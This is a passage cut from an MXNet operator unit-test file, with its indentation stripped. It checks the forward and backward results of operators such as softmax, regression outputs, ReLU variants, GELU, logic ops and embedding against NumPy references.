exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
